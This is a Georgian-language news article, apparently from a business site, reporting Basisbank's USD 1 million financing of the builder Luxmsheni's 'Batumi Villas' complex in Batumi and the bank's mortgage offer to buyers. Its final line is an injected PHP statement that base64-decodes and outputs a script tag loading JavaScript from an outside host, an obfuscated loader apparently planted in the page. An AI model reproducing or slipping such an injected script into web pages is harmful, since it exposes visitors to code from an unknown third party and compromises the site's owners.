celsiusi
ავერსი საქკაბელი

 ბაზისბანკი განაგრძობს სამშენებლო და დეველოპერული პროექტების ფინანსურ მხარდაჭერას. ამჯერად, სამშენებლო კომპანია ლუქსმშენმა “Batumi Villas” განახორციელა. ახალი პროექტის განსახორციელებლად, ბაზისბანკის მიერ გაწეულმა ფინანსურმა მხარდაჭერამ, 1 მილიონი აშშ დოლარი შეადგინა.

“Batumi Villas” ბათუმის ახალ ბულვართან, გ. ანწუხელიძის ქ. 81-ში მდებარეობს, რომელიც განსხვავებული კონცეფციის ევროპული ტიპის დასახლებაა და გამორჩეული არქიტექტურის 10 საცხოვრებელ ვილას მოიცავს. კომპლექსი ყველანაირ პირობას უქმნის მობინადრეებს, რომ თავი საუცხოო გარემოსთან ერთად კომფორტულად იგრძნონ. ვილები უზრუნველყოფილია დაცვით, 24-საათიანი ვიდეომეთვალყურეობით, გაქირავებისა და მართვის სერვისით.

ლუქსმშენი ქართული სამშენებლო დეველოპერული კომპანიაა, რომელიც ბათუმში საიმედო საინვესტიციო გარემოს ქმნის. კომპანია მიზნად ისახავს თანამედროვე და ნოვატორული საცხოვრებელი კომპლექსების მშენებლობას და მომხმარებელზე ზრუნვას.

ბაზისბანკის და სამშენებლო კომპანია ლუქსმშენის ბიზნეს პარტნიორობით, ბათუმში ასევე საცხოვრებელი კომპლექსი შენდება. პრემიუმ კლასის ხუთსართულიანი საცხოვრებელი კომპლექსი მდებარეობს ბათუმში, გ. ანწუხელიძის 79-ში. ახალ ბულვართან ახლოს.

“Batumi Villas” შეძენის მსურველებს ბაზისბანკი გამარტივებულ იპოთეკურ სესხს სთავაზობს. განაცხადის შევსება შესაძლებელია ონლაინ.

52
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");